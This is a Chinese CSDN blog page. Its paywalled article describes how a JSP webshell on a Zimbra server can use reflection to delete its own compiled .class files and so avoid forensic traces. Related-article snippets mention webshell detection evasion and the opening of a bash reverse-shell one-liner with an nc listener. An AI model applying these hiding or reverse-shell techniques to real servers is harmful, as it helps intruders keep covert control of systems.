Java利用技巧——通过反射实现webshell编译文件的自删除

最新推荐文章于 2025-06-24 16:46:20 发布
最新推荐文章于 2025-06-24 16:46:20 发布
阅读量575 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HongYu012/article/details/123422896

0x00 前言

我们知道,当我们访问jsp文件时,Java环境会先将jsp文件转换成 .class 字节码文件,再由Java虚拟机进行加载,这导致了Java服务器上会生成对应名称的 .class 字节码文件。对于webshell,这会留下痕迹。 为了实现自删除 .class 字节码文件,我们可以通过反射获得 .class 字节码文件的路径,再进行删除。本文将以Zimbra环境为例,结合 AntSword-JSP-Template ,分析利用思路。

0x01 简介

本文将要介绍以下内容:

  • 通过反射实现webshell编译文件的自删除
  • 通过反射实现AntSword-JSP-Template

0x02 通过反射实现webshell编译文件的自删除

根据上篇文章《Java利用技巧——通过反射修改属性》的内容,我们按照映射 request -> _scope -> _servlet -> rctxt -> jsps ,通过多次反射最终能够获得JspServletWrapper实例

查看JspServletWrapper类中的成员, jsps -> value -> ctxt -> servletJavaFileName 保存 .java 编译文件的路径, jsps -> value -> ctxt -> classFileName 保存 .class 编译文件的路径,示例如下图

为了只筛选出当前jsp,可以通过request类的 getServletPath() 方法获得当前Servlet,如下图

最低0.47元/天 解锁文章

200万优质内容无限畅学
Java Tomcat内存马——filter内存马
m0_61506558的博客
11-17 798
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
Get Offer —— 渗透测试岗试题汇总(Web相关知识点)
Boom!脑洞大爆炸的博客
07-21 6081
一篇文章了解Web知识点
一句话反射shell
tudoutest的博客
12-28 970
通过一句话反射一个shell   首先你在自己的及其上起一个进程来监听 mypc$ nc -l -v 0.0.0.0 4444   ip就是你自己的ip 端口任意(我这里写的是4444) 注意这个端口不要被自己的防火墙过滤掉 比如ubuntu上可以用 ufw allow 端口号 来打开端口。   后面就是到要反射的及其上输入命令   Bash bash -i >&...
Java实现webshell
qq_43147121的博客
06-10 2844
最近Linux课程大作业要求我们实现一个类似于实验楼中那种左边是word右边是一个webshell的html 在网上找了一些webssh插件发现都不是Java实现,自己又没有在Mac上安装太多语言编译器仅仅有Java,python,c这几个而且除了Java其他的自己也不太熟练,所以打算自己实现一下webshell的功能。 在网上找了一些资料最好决定前端页面使用一个叫做xtrem.js的插件 后端还是使用我最了解的netty做http静态服务器和websocket连接 大致的思路如下: 首先从前台发送一个
WEB安全--Java安全--jsp webshell免杀
最新发布
m0_74800552的博客
06-24 364
介绍部分jsp webshell的原理
删除r.java,R.java文件删除自身
weixin_34616304的博客
02-12 143
I have a slight issue. When I add items to the menu.xml file, the R.java file in the gen folder does not generate. I've used the same code before and no problems have arisen. I am using Eclipse with t...
java 简单的webshell_一个简单的webshell
weixin_35430535的博客
02-26 795
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
webshell清理工具
04-27
可检测清除webshell文件
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2142
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3963
常用术语解释
java webshell_利用 Java Binary Webshell 对抗静态检测
weixin_39869378的博客
02-16 256
0x01 背景Webshell一般是指以服务端动态脚本形式存在的一种网页后门。在入侵检测的过程中,检测Webshell无疑是一大重点。比较常见的检测手法有:1.文件内容检测(静态检测)2.文件行为检测(动态检测)3.网络异常流量分析4.……其中,静态检测是比较简单有效的检测Webshell的手段之一。根据Webshell文件特征建立异常模型,并使用大量的Webshell样本对模型进行训练,通过诸...
memShell一个webshell驻留在javaweb服务器的内存中
08-07
memShell 一个webshell驻留在java web服务器的内存中
基于websocket开发webShell
09-07
一个基于websocket开发webshell
jsp删除文件
hxw4656的专栏
03-24 525
webshell详解
w17791476027的博客
08-03 6349
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成web和shell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
JavaWeb后门(webshell)基础
st3pby的博客
12-25 3438
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP WebshellJava是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
Javaweb安全——JSP Webshell
weixin_43610673的博客
08-22 7419
public static class x extends ClassLoader //继承ClassLoader {#恶意类字节码 BASE64Decoder code = new sun . misc . BASE64Decoder();//将base64解码成byte数组,并传入自定义类的get函数 System . out . println(result . newInstance());}.
WebShell -- Linux反弹
Web安全工具库
03-18 415
​终于明白了,超市那么多饮料,还是会有人买矿泉水,就像现在外面有很多诱惑,但最终还是会选择干净有趣的灵魂吧。。。 ---- 网易云热评 小攻:IP地址:192.168.139.129 Win7 小受:IP地址:192.168.139.128,Ubuntu 一、拿到webshell后,点击反弹提权 二、小攻运行nv -vv -l -p 3355 三、在反弹提权页面,输入小攻的地址及上面监听的端口号,点击开始连接 四、小攻已成功连接小受,输入命令函数w...
小研究 - 面向 Java 的高对抗内存型 Webshell 检测技术(四)
07-19 558
小研究 - 面向 Java 的高对抗内存型 Webshell 检测技术(四)
Java实现图片与文件上传的代码指南
对于文件上传,可以利用`HttpServletRequest`的`getInputStream`方法读取上传的文件流,再通过`FileOutputStream`等写入到服务器上。然而,这种方法在处理大文件时,很容易造成内存溢出,因此实际开发中,一般会借助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值